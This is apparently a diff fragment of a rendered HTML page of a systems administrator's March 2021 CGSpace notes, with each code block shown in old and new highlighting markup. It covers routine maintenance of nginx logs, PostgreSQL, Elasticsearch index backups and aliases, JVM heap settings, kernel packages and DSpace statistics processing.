<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"># zgrep <span style="color:#e6db74">&#39;143.233.242.132&#39;</span> /var/log/nginx/access.log.1 | grep -c Delphi
6237
# zgrep <span style="color:#e6db74">&#39;143.233.242.132&#39;</span> /var/log/nginx/access.log.1 | grep -c -v Delphi
6418
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># zgrep <span style="color:#e6db74">&#39;143.233.242.132&#39;</span> /var/log/nginx/access.log.1 | grep -c Delphi
</span></span><span style="display:flex;"><span>6237
</span></span><span style="display:flex;"><span># zgrep <span style="color:#e6db74">&#39;143.233.242.132&#39;</span> /var/log/nginx/access.log.1 | grep -c -v Delphi
</span></span><span style="display:flex;"><span>6418
</span></span></code></pre></div><ul>
<li>They seem to make requests twice, once with the Delphi user agent that we know and already mark as a bot, and once with a &ldquo;normal&rdquo; user agent
<ul>
<li>Looking in Solr I see they have been using this IP for awhile, as they have 100,000 hits going back into 2020</li>
@ -375,9 +375,9 @@ $ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_set
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | wc -l
13
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | wc -l
</span></span><span style="display:flex;"><span>13
</span></span></code></pre></div><ul>
<li>On 2021-03-03 the PostgreSQL transactions started rising:</li>
</ul>
<p><img src="/cgspace-notes/2021/03/postgres_querylength_ALL-week.png" alt="PostgreSQL query length week"></p>
@ -409,10 +409,10 @@ $ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_set
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-final/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
$ curl -s -X POST http://localhost:9200/openrxv-items-final/_clone/openrxv-items-final-2021-03-08
# start harvesting on AReS
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-final/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items-final/_clone/openrxv-items-final-2021-03-08
</span></span><span style="display:flex;"><span># start harvesting on AReS
</span></span></code></pre></div><ul>
<li>As I saw on my local test instance, even when you cancel a harvesting, it replaces the <code>openrxv-items-final</code> index with whatever is in <code>openrxv-items-temp</code> automatically, so I assume it will do the same now</li>
</ul>
<h2 id="2021-03-09">2021-03-09</h2>
@ -434,8 +434,8 @@ $ curl -s -X POST http://localhost:9200/openrxv-items-final/_clone/openrxv-items
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/doi-to-handle.py -i /tmp/dois.txt -o /tmp/handles.txt -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span>
</code></pre></div><h2 id="2021-03-10">2021-03-10</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/doi-to-handle.py -i /tmp/dois.txt -o /tmp/handles.txt -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span>
</span></span></code></pre></div><h2 id="2021-03-10">2021-03-10</h2>
<ul>
<li>Colleagues from ICARDA asked about how we should handle ISI journals in CG Core, as CGSpace uses <code>cg.isijournal</code> and MELSpace uses <code>mel.impact-factor</code>
<ul>
@ -444,12 +444,12 @@ $ curl -s -X POST http://localhost:9200/openrxv-items-final/_clone/openrxv-items
</li>
<li>Peter said he doesn&rsquo;t see &ldquo;Source Code&rdquo; or &ldquo;Software&rdquo; in the <a href="https://cgspace.cgiar.org/handle/10568/1/search-filter?field=type">output type facet on the ILRI community</a>, but I see it on the home page, so I will try to do a full Discovery re-index:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ time chrt -b <span style="color:#ae81ff">0</span> ionice -c2 -n7 nice -n19 dspace index-discovery -b
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>real 318m20.485s
user 215m15.196s
sys 2m51.529s
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ time chrt -b <span style="color:#ae81ff">0</span> ionice -c2 -n7 nice -n19 dspace index-discovery -b
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>real 318m20.485s
</span></span><span style="display:flex;"><span>user 215m15.196s
</span></span><span style="display:flex;"><span>sys 2m51.529s
</span></span></code></pre></div><ul>
<li>Now I see ten items for &ldquo;Source Code&rdquo; in the facets&hellip;</li>
<li>Add GPL and MIT licenses to the list of licenses on CGSpace input form since we will start capturing more software and source code</li>
<li>Added the ability to check <code>dcterms.license</code> values against the SPDX licenses in the csv-metadata-quality tool
@ -467,34 +467,34 @@ sys 2m51.529s
<ul>
<li>Switch to linux-kvm kernel on linode20 and linode18:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"># apt update <span style="color:#f92672">&amp;&amp;</span> apt full-upgrade
# apt install linux-kvm
# apt remove linux-generic linux-image-generic linux-headers-generic linux-firmware
# apt autoremove <span style="color:#f92672">&amp;&amp;</span> apt autoclean
# reboot
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># apt update <span style="color:#f92672">&amp;&amp;</span> apt full-upgrade
</span></span><span style="display:flex;"><span># apt install linux-kvm
</span></span><span style="display:flex;"><span># apt remove linux-generic linux-image-generic linux-headers-generic linux-firmware
</span></span><span style="display:flex;"><span># apt autoremove <span style="color:#f92672">&amp;&amp;</span> apt autoclean
</span></span><span style="display:flex;"><span># reboot
</span></span></code></pre></div><ul>
<li>Deploy latest changes from <code>6_x-prod</code> branch on CGSpace</li>
<li>Deploy latest changes from OpenRXV <code>master</code> branch on AReS</li>
<li>Last week Peter added OpenRXV to CGSpace: <a href="https://hdl.handle.net/10568/112982">https://hdl.handle.net/10568/112982</a></li>
<li>Back up the current <code>openrxv-items-final</code> index on AReS to start a new harvest:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-final/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
$ curl -s -X POST http://localhost:9200/openrxv-items-final/_clone/openrxv-items-final-2021-03-14
$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-final/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: false}}&#39;</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-final/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items-final/_clone/openrxv-items-final-2021-03-14
</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-final/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: false}}&#39;</span>
</span></span></code></pre></div><ul>
<li>After the harvesting finished it seems the indexes got messed up again, as <code>openrxv-items</code> is an alias of <code>openrxv-items-temp</code> instead of <code>openrxv-items-final</code>:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/_alias/&#39;</span> | python -m json.tool | less
...
&#34;openrxv-items-final&#34;: {
&#34;aliases&#34;: {}
},
&#34;openrxv-items-temp&#34;: {
&#34;aliases&#34;: {
&#34;openrxv-items&#34;: {}
}
},
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/_alias/&#39;</span> | python -m json.tool | less
</span></span><span style="display:flex;"><span>...
</span></span><span style="display:flex;"><span> &#34;openrxv-items-final&#34;: {
</span></span><span style="display:flex;"><span> &#34;aliases&#34;: {}
</span></span><span style="display:flex;"><span> },
</span></span><span style="display:flex;"><span> &#34;openrxv-items-temp&#34;: {
</span></span><span style="display:flex;"><span> &#34;aliases&#34;: {
</span></span><span style="display:flex;"><span> &#34;openrxv-items&#34;: {}
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span> },
</span></span></code></pre></div><ul>
<li>Anyways, the number of items in <code>openrxv-items</code> seems OK and the AReS Explorer UI is working fine
<ul>
<li>I will have to manually fix the indexes before the next harvesting</li>
@ -535,54 +535,54 @@ $ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-fina
</li>
<li>Back up the current <code>openrxv-items-final</code> index to start a fresh AReS Harvest:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-final/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
$ curl -s -X POST http://localhost:9200/openrxv-items-final/_clone/openrxv-items-final-2021-03-21
$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-final/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: false}}&#39;</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-final/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items-final/_clone/openrxv-items-final-2021-03-21
</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-final/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: false}}&#39;</span>
</span></span></code></pre></div><ul>
<li>Then start harvesting in the AReS Explorer admin UI</li>
</ul>
<h2 id="2021-03-22">2021-03-22</h2>
<ul>
<li>The harvesting on AReS yesterday completed, but somehow I have twice the number of items:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-final/_count?q=*&amp;pretty&#39;</span>
{
&#34;count&#34; : 206204,
&#34;_shards&#34; : {
&#34;total&#34; : 1,
&#34;successful&#34; : 1,
&#34;skipped&#34; : 0,
&#34;failed&#34; : 0
}
}
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-final/_count?q=*&amp;pretty&#39;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span> &#34;count&#34; : 206204,
</span></span><span style="display:flex;"><span> &#34;_shards&#34; : {
</span></span><span style="display:flex;"><span> &#34;total&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;successful&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;skipped&#34; : 0,
</span></span><span style="display:flex;"><span> &#34;failed&#34; : 0
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><ul>
<li>Hmmm and even my backup index has a strange number of items:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-final-2021-03-21/_count?q=*&amp;pretty&#39;</span>
{
&#34;count&#34; : 844,
&#34;_shards&#34; : {
&#34;total&#34; : 1,
&#34;successful&#34; : 1,
&#34;skipped&#34; : 0,
&#34;failed&#34; : 0
}
}
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-final-2021-03-21/_count?q=*&amp;pretty&#39;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span> &#34;count&#34; : 844,
</span></span><span style="display:flex;"><span> &#34;_shards&#34; : {
</span></span><span style="display:flex;"><span> &#34;total&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;successful&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;skipped&#34; : 0,
</span></span><span style="display:flex;"><span> &#34;failed&#34; : 0
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><ul>
<li>I deleted all indexes and re-created the openrxv-items alias:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s -X POST <span style="color:#e6db74">&#39;http://localhost:9200/_aliases&#39;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;actions&#34; : [{&#34;add&#34; : { &#34;index&#34; : &#34;openrxv-items-final&#34;, &#34;alias&#34; : &#34;openrxv-items&#34;}}]}&#39;</span>
$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/_alias/&#39;</span> | python -m json.tool | less
...
&#34;openrxv-items-temp&#34;: {
&#34;aliases&#34;: {}
},
&#34;openrxv-items-final&#34;: {
&#34;aliases&#34;: {
&#34;openrxv-items&#34;: {}
}
}
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s -X POST <span style="color:#e6db74">&#39;http://localhost:9200/_aliases&#39;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;actions&#34; : [{&#34;add&#34; : { &#34;index&#34; : &#34;openrxv-items-final&#34;, &#34;alias&#34; : &#34;openrxv-items&#34;}}]}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/_alias/&#39;</span> | python -m json.tool | less
</span></span><span style="display:flex;"><span>...
</span></span><span style="display:flex;"><span> &#34;openrxv-items-temp&#34;: {
</span></span><span style="display:flex;"><span> &#34;aliases&#34;: {}
</span></span><span style="display:flex;"><span> },
</span></span><span style="display:flex;"><span> &#34;openrxv-items-final&#34;: {
</span></span><span style="display:flex;"><span> &#34;aliases&#34;: {
</span></span><span style="display:flex;"><span> &#34;openrxv-items&#34;: {}
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span> }
</span></span></code></pre></div><ul>
<li>Then I started a new harvesting</li>
<li>I switched the Node.js in the <a href="https://github.com/ilri/rmg-ansible-public">Ansible infrastructure scripts</a> to v12 since v10 will cease to be supported soon
<ul>
@ -591,26 +591,26 @@ $ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/_alias/&#39;</s
</li>
<li>The AReS harvest finally finished, with 1047 pages of items, but the <code>openrxv-items-final</code> index is empty and the <code>openrxv-items-temp</code> index has a 103,000 items:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
{
&#34;count&#34; : 103162,
&#34;_shards&#34; : {
&#34;total&#34; : 1,
&#34;successful&#34; : 1,
&#34;skipped&#34; : 0,
&#34;failed&#34; : 0
}
}
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span> &#34;count&#34; : 103162,
</span></span><span style="display:flex;"><span> &#34;_shards&#34; : {
</span></span><span style="display:flex;"><span> &#34;total&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;successful&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;skipped&#34; : 0,
</span></span><span style="display:flex;"><span> &#34;failed&#34; : 0
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><ul>
<li>I tried to clone the temp index to the final, but got an error:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items-final
{&#34;error&#34;:{&#34;root_cause&#34;:[{&#34;type&#34;:&#34;resource_already_exists_exception&#34;,&#34;reason&#34;:&#34;index [openrxv-items-final/LmxH-rQsTRmTyWex2d8jxw] already exists&#34;,&#34;index_uuid&#34;:&#34;LmxH-rQsTRmTyWex2d8jxw&#34;,&#34;index&#34;:&#34;openrxv-items-final&#34;}],&#34;type&#34;:&#34;resource_already_exists_exception&#34;,&#34;reason&#34;:&#34;index [openrxv-items-final/LmxH-rQsTRmTyWex2d8jxw] already exists&#34;,&#34;index_uuid&#34;:&#34;LmxH-rQsTRmTyWex2d8jxw&#34;,&#34;index&#34;:&#34;openrxv-items-final&#34;},&#34;status&#34;:400}%
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items-final
</span></span><span style="display:flex;"><span>{&#34;error&#34;:{&#34;root_cause&#34;:[{&#34;type&#34;:&#34;resource_already_exists_exception&#34;,&#34;reason&#34;:&#34;index [openrxv-items-final/LmxH-rQsTRmTyWex2d8jxw] already exists&#34;,&#34;index_uuid&#34;:&#34;LmxH-rQsTRmTyWex2d8jxw&#34;,&#34;index&#34;:&#34;openrxv-items-final&#34;}],&#34;type&#34;:&#34;resource_already_exists_exception&#34;,&#34;reason&#34;:&#34;index [openrxv-items-final/LmxH-rQsTRmTyWex2d8jxw] already exists&#34;,&#34;index_uuid&#34;:&#34;LmxH-rQsTRmTyWex2d8jxw&#34;,&#34;index&#34;:&#34;openrxv-items-final&#34;},&#34;status&#34;:400}%
</span></span></code></pre></div><ul>
<li>I looked in the Docker logs for Elasticsearch and saw a few memory errors:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">java.lang.OutOfMemoryError: Java heap space
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>java.lang.OutOfMemoryError: Java heap space
</span></span></code></pre></div><ul>
<li>According to <code>/usr/share/elasticsearch/config/jvm.options</code> in the Elasticsearch container the default JVM heap is 1g
<ul>
<li>I see the running Java process has <code>-Xms 1g -Xmx 1g</code> in its process invocation so I guess that it must be indeed using 1g</li>
@ -622,20 +622,20 @@ $ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/_alias/&#39;</s
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"> &#34;openrxv-items-final&#34;: {
&#34;aliases&#34;: {}
},
&#34;openrxv-items-temp&#34;: {
&#34;aliases&#34;: {
&#34;openrxv-items&#34;: {}
}
},
</code></pre></div><h2 id="2021-03-23">2021-03-23</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span> &#34;openrxv-items-final&#34;: {
</span></span><span style="display:flex;"><span> &#34;aliases&#34;: {}
</span></span><span style="display:flex;"><span> },
</span></span><span style="display:flex;"><span> &#34;openrxv-items-temp&#34;: {
</span></span><span style="display:flex;"><span> &#34;aliases&#34;: {
</span></span><span style="display:flex;"><span> &#34;openrxv-items&#34;: {}
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span> },
</span></span></code></pre></div><h2 id="2021-03-23">2021-03-23</h2>
<ul>
<li>For reference you can also get the Elasticsearch JVM stats from the API:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/_nodes/jvm?human&#39;</span> | python -m json.tool
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/_nodes/jvm?human&#39;</span> | python -m json.tool
</span></span></code></pre></div><ul>
<li>I re-deployed AReS with 1.5GB of heap using the <code>ES_JAVA_OPTS</code> environment variable
<ul>
<li>It turns out that this <em>is</em> the recommended way to set the heap: <a href="https://www.elastic.co/guide/en/elasticsearch/reference/7.6/jvm-options.html">https://www.elastic.co/guide/en/elasticsearch/reference/7.6/jvm-options.html</a></li>
@ -644,8 +644,8 @@ $ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/_alias/&#39;</s
<li>Then I fixed the aliases to make sure <code>openrxv-items</code> was an alias of <code>openrxv-items-final</code>, similar to how I did a few weeks ago</li>
<li>I re-created the temp index:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -XPUT <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
</code></pre></div><h2 id="2021-03-24">2021-03-24</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XPUT <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
</span></span></code></pre></div><h2 id="2021-03-24">2021-03-24</h2>
<ul>
<li>Atmire responded to the <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=934">ticket about the Duplicate Checker</a>
<ul>
@ -659,105 +659,105 @@ $ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/_alias/&#39;</s
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"># du -s /home/dspacetest.cgiar.org/solr/statistics
57861236 /home/dspacetest.cgiar.org/solr/statistics
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># du -s /home/dspacetest.cgiar.org/solr/statistics
</span></span><span style="display:flex;"><span>57861236 /home/dspacetest.cgiar.org/solr/statistics
</span></span></code></pre></div><ul>
<li>I applied their changes to <code>config/spring/api/atmire-cua-update.xml</code> and started the duplicate processor:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ export JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;-Dfile.encoding=UTF-8 -Xmx4096m&#39;</span>
$ chrt -b <span style="color:#ae81ff">0</span> dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -r <span style="color:#ae81ff">1000</span> -c statistics -t <span style="color:#ae81ff">12</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ export JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;-Dfile.encoding=UTF-8 -Xmx4096m&#39;</span>
</span></span><span style="display:flex;"><span>$ chrt -b <span style="color:#ae81ff">0</span> dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -r <span style="color:#ae81ff">1000</span> -c statistics -t <span style="color:#ae81ff">12</span>
</span></span></code></pre></div><ul>
<li>The default number of records per query is 10,000, which caused memory issues, so I will try with 1000 (Atmire used 100, but that seems too low!)</li>
<li>Hah, I still got a memory error after only a few minutes:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">...
Run 1 —  80% — 5,000/6,263 docs — 25s — 6m 31s
Exception: GC overhead limit exceeded
java.lang.OutOfMemoryError: GC overhead limit exceeded
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>...
</span></span><span style="display:flex;"><span>Run 1 —  80% — 5,000/6,263 docs — 25s — 6m 31s
</span></span><span style="display:flex;"><span>Exception: GC overhead limit exceeded
